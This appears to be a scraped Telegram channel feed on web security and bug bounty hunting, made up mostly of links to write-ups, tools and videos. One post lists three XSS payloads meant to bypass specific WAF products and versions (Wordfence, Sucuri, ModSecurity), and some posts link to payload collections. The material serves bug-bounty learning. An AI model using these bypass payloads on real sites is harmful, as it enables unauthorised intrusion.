Web Security | Bug hunting – Telegram

Web Security | Bug hunting

@cybersecurityresources

7.3K subscribers

46 photos

2 files

473 links

A web penetration testing / General cybersecurity / Network related topics channel that provides direct links for interesting resources and notes.

Download Telegram

About

Blog

Apps

Platform

Web Security | Bug hunting

7.3K subscribers

Web Security | Bug hunting

https://incogbyte.github.io/pathtraversal/

885 views15:45

Web Security | Bug hunting

https://app.gitbook.com/@hassansaad00/s/fundamentals

891 views16:57

Web Security | Bug hunting

Christmas Gifts!🎄
WAF #XSS Bypasses

Wordfence 7.4.2
<a href=&#01javascript:alert(1)>

Sucuri CloudProxy (POST only)
<a href=javascript&colon;confirm(1)>

ModSecurity CRS 3.2.0 PL1
<a href="jav%0Dascript&colon;alert(1)">

Encode special chars properly.
#MerryChristmas! 🎅

By : Rodolfo Assis

1.04K views17:31

Web Security | Bug hunting

Heavy-duty and Advanced Cross Site Scripting Scanner

https://github.com/haroonawanofficial/XSS-Finder

999 views04:46

Web Security | Bug hunting

Complete Automated pentest framework for Information Gathering

https://github.com/haroonawanofficial/ReconCobra

1.04K views05:01

Web Security | Bug hunting

https://www.youtube.com/watch?v=RUIb2LKEia8

$2,940 Bounty for Twitter CRLF Injection | Bug Bounty 2019

1.16K views20:17

Web Security | Bug hunting

https://www.youtube.com/watch?v=gINAtzdccts

Finding Your First Bug: Manual IDOR Hunting

Hi everyone, welcome to the third video in the "Finding Your First Bug" in this series I'm going to go over some good first bugs: explain what they are, how to find them, show some examples of real bugs in the wild that paid out and finally do a practical…

1.13K views05:12

Web Security | Bug hunting

Collection of social engineering payloads

https://github.com/t3ntman/Social-Engineering-Payloads

GitHub - t3ntman/Social-Engineering-Payloads: Collection of social engineering payloads

Collection of social engineering payloads. Contribute to t3ntman/Social-Engineering-Payloads development by creating an account on GitHub.

1.13K views03:22

Web Security | Bug hunting

OSINT Framework :
https://osintframework.com

1.08K views05:21

Web Security | Bug hunting

https://medium.com/@alex.birsan/the-bug-that-exposed-your-paypal-password-539fc2896da9

The Bug That Exposed Your PayPal Password

And Credit Card Number Too

1.02K views02:02

Web Security | Bug hunting

This repository is primarily maintained by Omar Santos and includes thousands of resources related to ethical hacking / penetration testing, digital forensics and incident response (DFIR), vulnerability research, exploit development, reverse engineering, and more.

https://github.com/The-Art-of-Hacking/h4cker/

GitHub - The-Art-of-Hacking/h4cker: This repository is maintained by Omar Santos (@santosomar) and includes thousands of resources…

This repository is maintained by Omar Santos (@santosomar) and includes thousands of resources related to ethical hacking, bug bounties, digital forensics and incident response (DFIR), AI security,...

5.62K views06:08

Web Security | Bug hunting

https://www.youtube.com/watch?v=08MkzhK1pyU

1.2K views03:15

Web Security | Bug hunting

Toolkit to detect and keep track on Blind XSS, XXE & SSRF

https://github.com/SpiderMate/B-XSSRF

GitHub - SpiderMate/B-XSSRF: Toolkit to detect and keep track on Blind XSS, XXE & SSRF

Toolkit to detect and keep track on Blind XSS, XXE & SSRF - SpiderMate/B-XSSRF

1.04K views14:39

Web Security | Bug hunting

https://medium.com/@unknownuser1806/problems-i-have-faced-in-bug-bounty-3c9d0a679d8b

Problems I have faced in Bug Bounty

This is my second blog about #bugbounty.You can check out my first blog that is full of resources and content for bug bounty hunters. If…

1.84K views17:52

Web Security | Bug hunting

https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952

Blind SQL Injection without an “in”

Alternative ways to retrieve table names in MySQL — without information_schema.

1.03K views17:55

Web Security | Bug hunting

https://hipotermia.pw/bb/http-desync-account-takeover

hipotermia - Account takeover via HTTP Request Smuggling

A bug chain of HTTP Request Smuggling that led to account takeover

1.12K views13:11

Web Security | Bug hunting

https://hackbotone.com/blog/10-recon-tools-for-bug-bounty

1.3K views13:12

Web Security | Bug hunting

https://medium.com/cyberverse/crlf-injection-playbook-472c67f1cb46

CRLF Injection Playbook

Hello Guys,
Just a Rough analysis of bugs Disclosed Publicly about CRLF injection

1.39K views22:59

Web Security | Bug hunting

https://twitter.com/mashoud1122/status/1221855871711547397

1.32K views01:05

Web Security | Bug hunting

https://medium.com/@vbharad/account-takeover-through-password-reset-poisoning-72989a8bb8ea

Account Takeover Through Password Reset Poisoning

1.21K views03:54

Web Security | Bug hunting

https://blog.intigriti.com/2020/02/24/twitter-recap-1-bug-bounty-tips-by-the-intigriti-community/

Twitter Recap #1 - Bug Bounty Tips by the Intigriti Community

Bug Bounty Tips Over the past years we have shared a lot of tips to help our readers in one way or another. Thinking outside the box or trying a different approach could be the defining factor in...

843 views19:53